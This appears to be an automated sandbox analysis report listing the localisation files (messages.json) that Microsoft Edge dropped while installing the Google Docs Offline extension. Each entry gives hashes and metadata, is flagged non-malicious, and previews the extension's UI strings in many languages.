                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                          Malicious:false
